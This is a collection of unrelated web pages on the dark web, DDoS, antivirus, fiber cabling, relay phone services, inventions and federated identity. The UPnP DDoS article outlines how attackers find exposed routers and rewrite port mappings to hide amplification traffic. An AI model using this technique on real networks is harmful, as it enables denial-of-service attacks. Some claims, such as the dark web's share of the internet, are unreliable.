If it is, you're good to go and can start surfing the dark web.
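If you want to script the same check, a rough sketch follows. It queries the public ipify service (an illustrative choice; any “what is my IP” endpoint would do) before and after connecting the VPN, and flags a leak if the address has not changed.

```python
import urllib.request

def public_ip() -> str:
    """Ask a public 'what is my IP' service (here api.ipify.org, chosen
    for illustration) for the address the wider internet sees."""
    with urllib.request.urlopen("https://api.ipify.org") as resp:
        return resp.read().decode().strip()

input("1. Disconnect your VPN, then press Enter... ")
real_ip = public_ip()

input("2. Connect your VPN, then press Enter... ")
vpn_ip = public_ip()

if vpn_ip == real_ip:
    print(f"LEAK: your real IP ({real_ip}) is still visible -- do not proceed.")
else:
    print(f"OK: traffic now appears to come from {vpn_ip}.")
```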
The last thing you need to do to access the dark web is find links for sites hosted there. Unlike the surface web, you won’t be able to find dark web sites through a search engine. Rather, you’ll need to visit dark web aggregators that share links to various pages, or wikis where users can add dark web links manually.
From there, as you navigate through the dark web, it’s up to you to stay on the path you’ve laid out for yourself, avoid criminal market places, and to keep any personal information close to your chest.
Staying off the dark web, if possible, is crucial for several reasons, primarily due to the inherent risks and illegal activities that dominate this hidden part of the internet. The dark web is notorious for hosting marketplaces that deal in illegal goods and services, such as drugs, weapons, counterfeit money, stolen data, and even human trafficking.
Engaging with these sites, even inadvertently, can expose individuals to serious legal consequences, including criminal charges. Law enforcement agencies worldwide monitor the dark web, and accessing these illicit markets, even out of curiosity, can draw unwanted attention and legal scrutiny.
Moreover, the dark web is rife with cybersecurity threats. The anonymity that the dark web provides attracts criminals, hackers, and malicious entities. Visiting dark web sites can expose users to malware, ransomware, and phishing attacks, putting personal and financial information at severe risk.
The utter lack of regulation and the prevalence of sophisticated cybercriminals make it easy for users to fall victim to scams or data breaches on the dark web, ultimately underscoring the importance of avoiding the dark web altogether.
The dark web is made up of a variety of different overlay networks and accounts for somewhere between 5-6% of the overall internet. It allows users to buy and sell, browse, and communicate with nearly complete anonymity.
This makes it really appealing for those who want to avoid unnecessary surveillance or who need to communicate without fear of oppression or governmental retaliation. However, if you’re planning to spend any time exploring the dark web, it’s crucial you take the necessary precautions to keep your device, your data, and yourself safe.
Keeping your company network safe requires a dedicated strategy that makes use of multiple defense measures for a comprehensive cybersecurity strategy. Learn how your current cybersecurity measures live up to industry best practices with DOT Security’s Cybersecurity Checklist: How Covered Is Your Business? | <urn:uuid:e476860f-2cba-4211-a950-637f69358cd0> | CC-MAIN-2024-38 | https://dotsecurity.com/insights/how-to-access-the-dark-web-safely | 2024-09-20T23:17:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00277.warc.gz | en | 0.92576 | 2,304 | 2.9375 | 3 |
Distributed Denial of Service (DDoS) attacks are a huge cybersecurity problem. And they’re only getting worse. According to Neustar’s May 2017 Worldwide DDoS Attacks & Cyber Insights Research Report, 84% of the 1,010 organizations surveyed suffered at least one significant DDoS attack in the past twelve months, up from 73% in 2016.
86% of the surveyed organizations reported multiple DDoS attacks in that time period. Compared to 2016, the 2017 report recorded twice as many DDoS attacks that exceeded 50 Gbps. Chances are 2018 will be even worse.
Now, there’s news of a new type of DDoS attack. This attack method is designed to evade DDoS mitigation measures, making it a stealthier way to bring down targeted networks.
UPnP DDoS Attacks
Security researchers at Imperva have discovered a sneaky new way to perform a DDoS attack. They caught cyber attackers using it in the wild, and they’ve been able to replicate the attack themselves.
The Universal Plug and Play (UPnP) protocol is designed to facilitate device discovery over a network using UDP port 1900, and then can use a TCP port for device control. UPnP is often used within LANs so that routers, printers, and client machines can discover each other and communicate. When implemented properly, this can make a network administrator’s job easier.
Unfortunately, UPnP has a number of well known vulnerabilities. Default settings can leave UPnP open to external cyber attackers because the protocol lacks an authentication mechanism. There are also lots of remote code execution vulnerabilities which are specific to UPnP.
DDoS attacks in general are often mitigated by identifying particular source ports and blocking their traffic. But with the way that UPnP is designed, cyber attackers can easily mask the source port they’re exploiting. UPnP is made to forward Internet connections to a LAN by mapping IP port connections to local IP port services. Routers should only allow internal port connections to go through UPnP, but few routers properly verify that they are internal. That vulnerability can be exploited by cyber attackers to route their external connections to their targeted LAN. If the attacker is able to poison the port mapping table, they can exploit the router as a proxy.
Using that exploit to mask their source port, cyber attackers can proceed to execute an amplification DDoS attack.
Typical amplification DDoS attacks use the source port of the port which amplifies the attack. So by blocking specific ports, those attacks can usually be mitigated. Obviously, that doesn’t apply to amplification DDoS attacks which exploit UPnP.
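The root cause is that routers fail to validate the port-mapping requests they receive. A minimal sketch of the check a well-behaved router could perform is below; the LAN subnet is an assumed example.

```python
import ipaddress

LAN = ipaddress.ip_network("192.168.1.0/24")  # assumed example LAN subnet

def mapping_is_safe(internal_client: str, requester: str) -> bool:
    """Reject UPnP port mappings whose 'internal' target is not actually
    on the LAN, or whose requester came from outside the LAN."""
    client = ipaddress.ip_address(internal_client)
    source = ipaddress.ip_address(requester)
    return client in LAN and source in LAN

print(mapping_is_safe("192.168.1.50", "192.168.1.20"))  # True: legitimate
print(mapping_is_safe("8.8.8.8", "192.168.1.20"))       # False: external target
print(mapping_is_safe("192.168.1.50", "203.0.113.7"))   # False: external requester
```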
UPnP DDoS Attacks in Practice
Imperva mitigated what was probably the first UPnP DDoS attack they discovered on April 11, 2018. They observed an SSDP (Simple Service Discovery Protocol) amplification assault. Some of the SSDP payloads came from an unexpected source port instead of UDP port 1900. Imperva researchers were perplexed by what they saw. To help discover what was going on, they eventually created a proof of concept that uses UPnP to obfuscate the source port of a DDoS amplification attack. Eureka!
The first step in creating the proof of concept was using the Shodan search engine to find an exploitable UPnP router. Those devices often have a “rootDesc.xml” file, so that’s how the search was queried.
Once they found an exploitable UPnP router, they accessed the XML file through HTTP by changing the file’s location IP address.
The next step involved editing the “rootDesc.xml” file to modify the port forwarding rules. The rules need to be modified in such a way to allow an attacker to route external IP connections to internal IPs. That step takes advantage of how most routers don’t properly verify that stated internal IPs are actually internal. Oops!
To set the stage for an amplification DDoS attack which exploits UPnP for obfuscation, the following steps had to be taken:
- A DNS request was sent to the targeted UPnP router through UDP port 1337.
- Thanks to the new port forwarding rules, the request was sent to a DNS resolver over destination port UDP 53.
- The resolver responded to the device through source port UDP 53.
- Then the source port was changed to UDP port 1337, and the targeted UPnP router forwarded the DNS response to the source of the request.
With all of that taken care of, an amplification DDoS attack can then be executed and most DDoS mitigation methods wouldn’t be able to stop it. The same method demonstrated in Imperva’s proof of concept can be used with NTP and SSDP attacks instead of DNS. Memcached DDoS attacks could use the new UPnP obfuscation method as well.
Mitigating This Attack Method
So how can this new DDoS attack method be mitigated? According to Imperva:
“With source IP and port information no longer serving as reliable filtering factors, the most likely answer is to perform deep packet inspection (DPI) to identify amplification payloads—a more resource-intensive process, which is challenging to perform at an inline rate without access to dedicated mitigation equipment.”
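On the defensive side, administrators can also audit their own gateways for unexpected UPnP port mappings. The sketch below walks the WANIPConnection mapping table over SOAP; the control URL is a hypothetical placeholder, and in practice you would read the real path and port from your router’s rootDesc.xml:

```python
# Minimal sketch: enumerate a router's UPnP port mappings as a defensive
# audit. The control URL below is a hypothetical placeholder -- take the
# real path and port from the <controlURL> entry in your rootDesc.xml.
import requests

CONTROL_URL = "http://192.168.1.1:49152/upnp/control/WANIPConn1"
SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"

def get_mapping(index: int) -> requests.Response:
    body = f"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
            s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:GetGenericPortMappingEntry xmlns:u="{SERVICE}">
      <NewPortMappingIndex>{index}</NewPortMappingIndex>
    </u:GetGenericPortMappingEntry>
  </s:Body>
</s:Envelope>"""
    headers = {
        "SOAPAction": f'"{SERVICE}#GetGenericPortMappingEntry"',
        "Content-Type": 'text/xml; charset="utf-8"',
    }
    return requests.post(CONTROL_URL, data=body, headers=headers, timeout=5)

# Walk the mapping table; routers typically answer HTTP 500 (UPnP error
# 713) once the index runs past the last entry.
for index in range(64):
    resp = get_mapping(index)
    if resp.status_code != 200:
        break
    print(resp.text)  # raw SOAP reply; any mapping you didn't create is suspect
```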
Did the DDoS attack that Imperva mitigated on April 11 actually exploit UPnP for port obfuscation?
“It should be noted that we also considered alternative hypotheses for the attack that prompted our investigation. For instance, that the occurrence in question could have been explained by an internal network setup or a purposeful forwarding configuration, which unintentionally resulted in port obfuscation.”
But another DDoS amplification attack that Imperva mitigated on April 26 supported their original hypothesis, behaving just as their proof of concept had demonstrated. The April 26 attack was executed through an NTP amplification vector, and some of the payloads originated from a source port other than the usual UDP port 123. That attack worked just like their proof of concept, with NTP substituted for DNS.
So if cyber attackers start using UPnP obfuscation more frequently to execute amplification DDoS attacks that evade the usual mitigation measures, more defenses are going to have to implement deep packet inspection. It may be more resource-intensive, but it may be absolutely necessary as DDoS attacks evolve.
A lot of jargon is thrown around when it comes to protecting your computer and devices, including the terms antivirus and antimalware. It can get confusing which one you should be using and whether the two are actually that different from one another. Here is what you need to know.
What is Antivirus Software?
Antivirus software is designed to protect against, detect, and remove viruses that have been downloaded onto your computer. A virus is code placed on your computer in an effort to do malicious deeds against you by adding, deleting, or changing files that are on your computer.
The point of a virus is destruction and general frustration.
A virus is not going to take anything from your computer or device, but will attempt to ruin your device or items on it.
What is Antimalware Software?
Antimalware software works in much the same way as antivirus software, in that its purpose is to protect against, detect, and remove any malware that has been downloaded onto your computer or your device. There is a difference between malware and viruses, however: a virus, while destructive, is not as dangerous to you as other malware can be.
Malware includes things like Trojans, ransomware, rootkits, and sometimes viruses as well. Malware has many forms and many ways to do harm against you or your computer, including destroying things on your device or removing things from your device in an effort to steal your information or hold it for ransom until you pay up. Antimalware software is designed to defend you against malware so nothing like that happens to you, your computer, or any other device.
The Real Differences between Antivirus and Antimalware
There are some differences to understand when you are looking to purchase antivirus or antimalware software. A common misconception is that antivirus software can protect against all malware and that antimalware can protect against all viruses. That is not always the case, and taking it for granted that one type or the other will keep you safe from everything could open you up to attacks. The situation gets murkier when you have software that calls itself antivirus when it really behaves as antimalware.
Viruses had their peak in the 1990s, and while they still exist today, they are now a minority of the threats that can actually hurt your devices. Different forms of malware are more dangerous and destructive than a standard virus. But the bottom line is that some antimalware protects against viruses.
Which Type of Protection You Need
When you are shopping for reliable antivirus or antimalware software, the first thing to look at is how thorough the protection on offer actually is. Avast, an antivirus product, also offers protection from some forms of malware. McAfee, an antimalware company, offers protection from malware that, they say, also includes viruses. When you are deciding what to use, read which specific kinds of malware are covered to make sure you are getting the most thorough protection possible. It is also important to note that some free or inexpensive products do not protect you in every way possible; the more money you spend to upgrade the protection, the more protection they will offer.
What to Look for in Protection
There are a few things that you can look for when you are shopping for protection in order to help you decide what is right for your specific needs. These are the features that you should be looking at.
- Scanning: This means virus and malware scanning that always runs in the background of whatever you are using, watching for anything that could be harmful. Most antivirus and antimalware software offers a real-time scanning feature to nip malicious software in the bud before it downloads or causes any harm.
- Script blocking: The software should also block any malicious script files before they start to run.
- Heuristic analysis: This is a method of looking out for viruses or malware that are not yet commonly known. Antimalware vendors try to stay as current as possible and keep up with cybercriminals, but it is of course hard to protect against new types of malware that have not been discovered yet. An analysis engine that can still catch such emerging threats can save you a lot of headaches.
- Malware and virus removal: You need to make sure that your software will actually get rid of the malware it finds, not just detect it.
- Ransomware protection: This is one of the newest forms of malware, where cybercriminals lock up your important information and hold it for ransom until you pay them off.
Antivirus and Antimalware on Mobile Devices
A common question, given the amount of time that we spend using our smartphones and tablets, is whether we can or should use antivirus or antimalware software on our mobile devices. The answer is not completely straightforward. If you use an Android or Google device, you can download software to protect your device from viruses and other malware. If you use an Apple device, you cannot.
Apple states that its iOS is protected against malware and viruses well enough that more software is not warranted. They also do not allow you to download things onto your phone or device that could alter the operation of the device.
How Malware and Viruses Appear
We have spent some time explaining how antivirus and antimalware software protects you from malicious activity, but we should also look at how malware gets to you in the first place. There are many routes by which malware and viruses can infect your computer and devices. Malware architects are tricky and will use sneaky ways to get you to download malware onto your computer.
- Via email: One of the most effective ways of unwittingly receiving malware is through your email. You receive an email from someone or something that looks familiar with a file attached, and the email tells you to open or download the attachment to receive whatever is on offer. When you open the attachment, the malware begins to download onto your computer. You can protect yourself by not opening emails from strange or unknown sources, or attachments that you were not expecting.
- Via removable drive: Another way that malware makes its way onto your computer is through an infected drive, whether a flash drive or an external drive. When you connect the drive to your computer, the malware can be installed automatically. A good way to prevent this is to make sure your computer has autorun turned off, so it will not automatically run whatever is on a drive when it is plugged in.
- Via websites: Sometimes a website has been compromised and has malware ready to be downloaded onto your computer. If a site requests that you install or download something that does not make sense, that is a red flag, and you should not allow the download. This is a big reason to have antimalware software installed on your computer: it protects you against surprise attacks.
- Via other software: There are instances when you are installing something on your computer and malware has been snuck into the bundle. It could be disguised as an add-on, like something as simple as a toolbar, or as a program that looks harmless but is actually infected. You can usually opt out of those extra downloads and remove any add-ons you never wanted to begin with, saving yourself the unnecessary risk.
- Anything else: Really anything that can download onto your computer could contain malware or viruses, which is why you must have some kind of protection in place to ensure that you do not wind up with a compromised or infected computer.
One of the most essential things to remember once you have selected your antivirus or antimalware software is that you must keep it up to date. It is foolish to assume that once the software is installed you are good to go.
Malware and viruses are ever-changing, and the software that defends against them has to be ready to evolve and change as well, to ensure you are protected against the newest forms of malware along with those already known.
Cybercriminals are savvy and skilled as well as incredibly persistent in their endeavors. So as we get smarter in defenses, they look for new ways to cause harm. | <urn:uuid:00703e1d-60b8-483c-821e-2abc8df0270d> | CC-MAIN-2024-38 | https://bluegadgettooth.com/difference-between-antivirus-antimalware/ | 2024-09-07T13:45:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00577.warc.gz | en | 0.968555 | 1,757 | 3.390625 | 3 |
Definition of Multimode Fiber-Optic Cabling in the Network Encyclopedia.
What is Multimode Fiber-Optic Cabling?
Multimode is a type of fiber-optic cabling whose wide core allows light to travel along multiple paths (modes) at once, so multiple signals can be transmitted simultaneously. Line drivers for multimode fiber-optic cabling use light-emitting diodes (LEDs) to generate the light signals that carry the data down the fiber.
How It Works
Multimode fiber, whose relatively wide glass core lets light propagate along multiple paths, is implemented in two main forms that differ in how the core’s index of refraction behaves across its radius:
- Step-index multimode fiber: The light rays reflect off the walls of the core by total internal reflection. Depending on the angle at which the rays are incident on the surface of the core, different light paths are created that can carry additional signal bandwidth. In longer cables, these paths can get out of step with each other at the far end of the fiber and degrade signal quality.
- Graded-index multimode fiber: The core consists of concentric layers of material. Each successive layer has a lower index of refraction than the one that it envelops. As a result, rays of light travel along curved paths and all arrive in step with each other at the far end of the fiber.
Multimode fiber is available with different core diameters, typically 50, 62.5, and 100 microns. Multimode fiber can carry more signals simultaneously than single-mode fiber, but single-mode fiber can carry signals up to 50 times farther than multimode.
Read this recent article to learn more about types of optic fiber.
Multimode fiber is not recommended for long cable runs and should generally be restricted to runs of 914 meters. If this limit is exceeded, the light traveling along different paths through the fiber can produce a condition called modal dispersion, which results in parts of the signal arriving at unexpected times at the end station. This can degrade the quality of the signal or cause it to be unrecognizable.
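To see why run length matters, here is a back-of-the-envelope calculation of modal dispersion in step-index fiber. The refractive indices are typical assumed values for silica fiber, not figures from this article:

```python
# Back-of-the-envelope modal dispersion for step-index multimode fiber.
# The refractive indices are assumed, typical values for silica fiber.
C = 299_792_458.0   # speed of light in vacuum, m/s

n1 = 1.48           # assumed core index
n2 = 1.46           # assumed cladding index
L = 914.0           # run length in meters (the limit cited above)

t_axial = L * n1 / C              # fastest path: straight down the axis
t_oblique = L * n1**2 / (C * n2)  # slowest guided path (critical-angle ray)
spread = t_oblique - t_axial      # arrival-time spread between the paths

print(f"Pulse spread over {L:.0f} m: {spread * 1e9:.1f} ns")
# A pulse smeared by ~62 ns caps the usable signaling rate at very
# roughly 1/(2 * spread), which is why longer runs degrade the signal.
print(f"Rough bandwidth ceiling: {1 / (2 * spread) / 1e6:.0f} MHz")
```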
Step-index fiber is cheaper than graded-index fiber and should be used only for shorter cable runs or where less bandwidth is required.
- AmazonBasics 10Gb 40Gb Multimode OM3 Duplex 50/125 OFNP Fiber Patch Cable LC to LC – 30 Meters
- 6 Fiber Indoor/Outdoor Fiber Optic Cable, Multimode, 62.5/125, Black, Riser Rated, Spool, 1000 Foot
- Gigabit Ethernet Media Converter, Single-Mode Dual SC Fiber, 1000Base-LX to 10/100/1000Base-Tx, up to 20km, Pack of 2
- 150 Meter 10Gb OM3 Multimode Duplex Fiber Optic Cable (50/125) – LC to LC – Aqua | <urn:uuid:b493c761-c2e9-483b-b389-9f3918893038> | CC-MAIN-2024-38 | https://networkencyclopedia.com/multimode-fiber-optic-cabling/ | 2024-09-12T11:34:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00177.warc.gz | en | 0.882958 | 580 | 3.15625 | 3 |
Telecommunications Relay Service (TRS)
Dial 7-1-1 or Special Toll-Free Numbers Listed in Your Telephone Directory
Telecommunications Relay Service is a free telephone service that allows persons with hearing or speech disabilities to place and receive telephone calls using standard telephone equipment or telephone equipment designed for individuals with disabilities. To use Relay dial one of the toll free numbers listed in your telephone directory, or simply dial 7-1-1. A specially trained Communications Assistant (CA) will answer your call and relay the telephone conversation between you and the party you are calling. All call information and conversations are confidential. Relay service is available 24 hours per day, 365 days a year. Long-distance calls placed for you can be billed to your existing long-distance service calling plan, collect, or with the use of a pre-paid calling card, carrier calling card, or third-party billing.
Types of TRS Calls
Computer (ASCII): users can access Relay Service by setting the communications software to the following protocols: speeds ranging from 300 to 2400 baud; 8 Bits; No Parity; 1 Stop Bit; Full Duplex. For speeds at or below 300 baud, follow the above using Half Duplex.
Hearing-Carry-Over (HCO): HCO allows hearing individuals with very limited or no speech capability to type their side of the conversation for the Communications Assistant to read aloud to the other party. The HCO user hears the other party’s response. HCO requires a specially designed telephone.
Internet Protocol (IP) Relay: Connect to the relay using your computer or other web device. The Communications Assistant handles the call the same as a traditional relay call - “voicing,” or reading everything you type, to the other party - and typing everything the other party says for you to read on your screen.
Spanish Relay: Spanish speaking persons with a hearing or speech disability are able to make relay calls. This is not a translation service – both parties must speak Spanish, and at least one party must have a hearing or speech disability.
Speech-to-Speech (STS): STS allows a person who has difficulty speaking or being understood on the phone to communicate using his or her own voice or voice synthesizer. The Communications Assistant revoices the words of the person with the speech disability so the person on the call can understand them. No special telephone is required.
Text Telephone (TTY): Allows anyone who is deaf, hard of hearing or speech disabled to use a TTY to communicate with anyone using a standard telephone.
Video Relay Service (VRS): Allows natural telephone communication between Sign Language and standard telephone users. This service requires high-speed internet service such as DSL, cable modem, or mobile broadband modem.
Voice-Carry-Over: VCO enables people who have difficulty hearing on the phone to voice their conversations directly to the hearing person. The CA then types the hearing person’s response to the VCO user. (Requires a special telephone with text display.)
Voice/Standard Telephone: A hearing person may use a standard telephone to place a relay call and easily converse with a person who is deaf, hard of hearing or speech disabled.
Voice Over Internet Protocol (VOIP): VoIP customers can access the Telecommunications Relay Service (TRS) by dialing 7-1-1 or using the toll-free number listed in your telephone directory. | <urn:uuid:471fc636-4b84-4ee1-a9bf-888bf6f44496> | CC-MAIN-2024-38 | https://www.brightspeed.com/aboutus/legal/consumer/legal-notices/2024-annual-customer-rights.html | 2024-09-13T18:43:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00077.warc.gz | en | 0.907168 | 713 | 2.53125 | 3 |
Whether they are present in the classroom or logging on from home, it’s challenging to keep students engaged in schoolwork. Often, concentration on the lesson IS the lesson!
Over the past decade, technology has greatly impacted education. From introducing new ways to interact with families and students, to lesson planning, organizing reports, managing and creating data, and more!
Every year schools, colleges, and universities welcome new students, and each year these new students generate a wide range of documents. From applications and admission forms to report cards, attendance and behavior records, and curriculum and financial aid documents, each needs to be properly processed, filed, and retrievable. Many of these documents are required by law to be kept for long periods of time.
Ever since the COVID-19 pandemic forced many companies to send their employees home to work, long-term remote work arrangements have become commonplace.
Remote learning is becoming more and more popular – if not necessary – since the COVID-19 coronavirus pandemic. While many schools are opening fully, many educational institutions will be teaching online, or at least partially through remote learning.
Schools and educational institutions are under a lot of pressure to open safely despite the current COVID-19 coronavirus pandemic. Whether your school is reopening fully, or a smaller scale opening is in the works, containing viral spread is critical.
In 2020, the novel coronavirus COVID-19 completely disrupted all aspects of life, including education. | <urn:uuid:369b794d-bac3-480f-ad90-c36134e0f74f> | CC-MAIN-2024-38 | https://blog.dsinm.com/blog/tag/education | 2024-09-14T21:39:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00877.warc.gz | en | 0.961159 | 310 | 2.890625 | 3 |
These days, technology and invention go hand in hand. While they’re not synonymous, it would be hard to separate the two. Invention almost always involves technology at some level of intricacy, while technology constantly reinvents itself in new ways that have a profound impact on how we conduct everyday life. What is undeniably true is that inventors and technologists — past, present, and future — are the creative geniuses behind the very shape of the world we live in today and tomorrow.
May is not only National Inventors Month but it also houses the National Day of Technology, celebrated annually on May 11. This makes May especially important to us at Hitachi Solutions.
Hitachi Ltd. — our parent company — was founded by a young Japanese inventor named Namihei Odaira more than 100 years ago. Though an electrical engineer by trade, Odaira had a passion for the possibilities. A true pioneer, he valued imaginative thinking as well as the people who worked for him.
Hitachi Solutions today employs people who are constantly iterating to improve upon the good to make it better. It is the big-picture see-ers, creative differentiators, and pioneering doers that innovate and build the very solutions that enable our customers to continue to thrive in the ever-evolving landscape of technology.
Can we create it, build it, and fix it? Of course, and yes, we can! There are so many ways in which we help our customers achieve their goals — often through innovations, solutions, and managed services that run seamlessly in the background. To learn more about how we leverage our capabilities to help our customers, visit our website!
As a shout-out to the mighty — but possibly overlooked — heroes of innovation and discovery, here is a fun list of lesser-known but important invention facts!
Did you know?…
- Back in 1845, Dr. Horace Day invented tape. By applying a sticky substance to strips of fabric, Dr. Day developed the first-ever surgical tape — which became the father of all tape. ALL tape? Yep. Big tape, little tape, wide tape, tall tape, Scotch tape, packing tape, double-sided-stick tape, and even alien tape!
- Seeing a need for something other than corncobs and seashells, Joseph Gayetty first patented toilet paper in Western countries in the 1850s. Known as “Medicated Paper for the Water Closet,” it was not widely used until the early 20th century. Wait…what?
- It’s not a problem at all! The NoseFrida, the new and improved version of the “snot sucker” (the aspirator bulb used to clear a baby’s stuffy nose), was invented by Swedish ear, nose, and throat doctor Frida Sångberg in the 1990s. First marketed in Sweden in 1997, it made its way to the United States in 2006, when Chelsea Hirschhorn founded FridaBaby and began distributing the product.
- For all of you who have been a victim of lunch theft, fear not. The Fake Mold Lunch Bag, invented by Sherwood Forlee in 2009, is here to thwart any sandwich thief’s diabolical plans to keep you hungry!
- In 2015, Lowell Wood, a close colleague of Bill Gates, received his 1,085th utility patent making him the first inventor to surpass Thomas Edison’s record of 1,084. Wood — known as one of the most influential physicists of his generation — has been honored with the Edward Teller Medal and the National Medal of Technology and Innovation. He currently holds 5,125 U.S. patents.
- The first LOLcat photograph didn’t start with icanhascheezburger. It actually dates back to 1903 when Harry Whittier Frees started photographing his cat, dressed up in doll clothes, and adding captions like “What’s Delaying My Dinner?”.
- You know it. We know it. Burnt toast sucks. Lucky for all of us, in 2015 James Stumpf began socializing his invention — the Glass and Bamboo Toaster. Charred wheat, multigrain, and white bread may very well be a thing of the past!
- Who hasn’t paused before dropping uncooked noodles into that boiling pot of water, wondering just how many noodles will equate to the right amount? Well, the Spaghetti Measuring Tool removes the belabored guesswork! Invented by Stefán Pétur Sólveigarson from Iceland, this tool measures out your pasta portion for you via creative cutout shapes!
Hitachi Solutions’ mission is “To contribute to society through the development of superior, original technology and products”. Join us this month of May in celebrating the accomplishments of inventors and technologists from all over the world that have done just that!
And, if you are interested in how our innovative spirit and proven achievements help customers just like you harness the benefits of Microsoft business applications and technologies, connect with us! | <urn:uuid:9c0bdeb3-3bca-4b99-8459-0c042d5ef8f5> | CC-MAIN-2024-38 | https://global.hitachi-solutions.com/blog/celebrating-technology-and-innovation/ | 2024-09-17T07:46:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00677.warc.gz | en | 0.956362 | 1,067 | 2.859375 | 3 |
What is Federated Identity Management?
Federated Identity Management, or FIM, occurs when two or more trusted domains allow their users to use the same digital identity to access applications across those domains. This enables users to move between multiple sites securely.
Why Is Federated Identity Management Important?
Users have dozens and dozens of accounts spread across professional, personal, and public services. Accordingly, they also have dozens of separate digital identities used to authenticate them across these services. That’s a problem from both user experience and security perspectives:
- Users notoriously have a hard time remembering passwords, usernames, PINs and so on. While requiring unique credentials is an obvious security step, users tend to forget passwords or express frustration when they have to create a new account for a new service.
- Following that poor user experience, many users simply use easy-to-remember passwords or reuse passwords across multiple sites, which means that it’s much easier for their credentials to be compromised and, in turn, compromise various platforms.
A federated identity attempts to solve this problem by securely using a single identity across multiple domains. Federation is the practice of “federating” (or connecting) different authentication systems through a set of agreements and standards so that users can provide one set of credentials to access numerous accounts across multiple platforms.
To facilitate this kind of interoperability, authentication systems use FIM solutions that provide a way for these platforms to share a common identity authentication language.
To create a secure and effective system that can be shared across platforms, designers often adhere to what is known as the “Seven Laws of Identity.” Created by Kim Cameron, Microsoft’s Chief Architect of Identity, in 2005, these laws were conceived to refocus authentication as a user-focused endeavor while creating a “metasystem” or identity layer that helps control, authenticate and protect digital authentication and verification information.
The seven laws are the following:
- User Control and Consent: Any system must put the user in control of their digital identity, including how they are used and how information is released. Additionally, the system must protect the user against deception and identity theft.
- Minimal Disclosure for a Constrained Use: The only information collected will be the minimum needed for the purposes of authentication or authorization. Likewise, any system that collects information can deter attacks if it adheres to minimal data principles.
- Justifiable Parties: An access solution makes the user aware of requesting information and policies about data use.
- Directed Identity: A system must support omnidirectional identification for public spaces and unidirectional identification over private connections, like Bluetooth.
- Pluralism of Operators and Technologies: An overarching system must operate with multiple technologies.
- Human Integration: An identity metasystem should put human users at the forefront with unambiguous human/machine communication that protects against attack or theft.
- Consistent Experience Across Contexts: The user experience must be consistent and straightforward through multiple operators.
A federated system would therefore attempt to follow these rules. For example, the ability to use your Google account to log into a mobile phone application relies on several of these rules just to authenticate a user.
Federated Identity and Single Sign-On
FIM sounds similar to other management approaches, most readily Single Sign-On (SSO). These technologies function, on the surface, in the same way in that they seemingly support a more straightforward way to consolidate authentication and verification. There are, however, differences, the most significant of which is the scope of application.
SSO functions within an organization. That is, SSO can support identity and access management (IAM) across systems, resources or devices within a single organization. Within the authentication system of a given infrastructure, SSO can streamline authentication into a single set of credentials.
FIM, however, creates a standard by which diverse applications across different organizations can support single-identity authentication. FIM uses common protocols and languages to build a trusted management service between these organizations. Some of the standard protocols that you will see used to create FIM systems are:
- Security Assertion Markup Language (SAML), which allows identity providers and service or application providers to exchange authentication and authorization data.
- OAuth, a delegation framework used for authorization between different organizations fielding applications through HTTPS or APIs.
- OpenID Connect, an authentication protocol that extends OAuth by adding an identity layer for more control over digital identity and authentication (illustrated in the sketch below).
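To make the hand-off concrete, here is a minimal sketch of the first step of an OpenID Connect login: building the authorization redirect. Every endpoint and client value below is a hypothetical placeholder, not a real provider:

```python
# Minimal sketch: build the authorization redirect that starts an
# OpenID Connect login. Every endpoint/client value is a placeholder.
from urllib.parse import urlencode
import secrets

IDP_AUTHORIZE = "https://idp.example.com/authorize"   # assumed IdP endpoint

params = {
    "response_type": "code",                    # authorization-code flow
    "client_id": "my-app-client-id",            # issued by the IdP
    "redirect_uri": "https://app.example.com/callback",
    "scope": "openid profile email",            # "openid" marks this as OIDC
    "state": secrets.token_urlsafe(16),         # CSRF protection
    "nonce": secrets.token_urlsafe(16),         # binds the ID token to this login
}

print(f"{IDP_AUTHORIZE}?{urlencode(params)}")
# The user authenticates once at the identity provider; the application
# then swaps the returned "code" for an ID token and never sees a password.
```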
Costs and Benefits of Federated Identity Management
Unsurprisingly, FIM has several advantages and disadvantages associated with its implementation.
Some of the benefits include the following:
- Streamline Authentication: Perhaps the most obvious benefit is that you make it easier for users to log in to your system. If you’re running an online app, this can break down resistance from potential users who might not want to create yet another account for another app.
- Security: With FIM, you are leveraging an identity layer to centralize security for your authentication system. In practice, this means that you can rely on another secure provider (like Google or Facebook) to verify identities that you know you can trust. Additionally, you potentially reduce the drive for users to use simple or redundant passwords that could compromise your systems.
- Reduce Administrative Overhead and Cost: If you trust another provider like Google to store and verify information, you remove the need to manage your own systems or keep user credentials.
While these are incredible advantages, it’s also essential to understand some of the challenges as well:
- Trusting Other Identity Platforms: In an FIM system, when a user provides credentials from another participating organization, you have to trust that that member has proper security, policies and protocols in place. If not, they could introduce vulnerabilities that you can’t detect until it is too late.
- Implementing Different Rules: Being part of an FIM system also means meeting minimum requirements regarding identity management and security. If you aren’t prepared for that, it could be a costly endeavor.
- Forcing Trust With Other Organizations: Speaking of trust. If you are in an FIM system, then there are expectations beyond the bare minimum of protocols. If you have a history of neglecting user privacy, not protecting data, or other unpopular security and customer approaches, you might find it hard to partner with others.
Use Cases for Federated Identity Management
One of the clearest use cases for FIM is Google services. Not only does Google use federated identity to support authentication across other sites, it also offers ways for enterprise users to build cloud services that can enter into FIM partnerships with other organizations. This way, if you use Google Cloud for professional reasons, you can federate identity to make access easier for outside users.
Federated identity is also used in several other contexts. For example, a university with wireless Internet access can use FIM to offer Wi-Fi access not only on campus but also with other partner institutions. This way, students and faculty can enjoy Wi-Fi at any partner location with a single set of credentials.
In all cases, you’ll see FIM used in three major patterns:
- Inbound Federation: Allows you to provide federated access to your application or resources to individuals outside your organization.
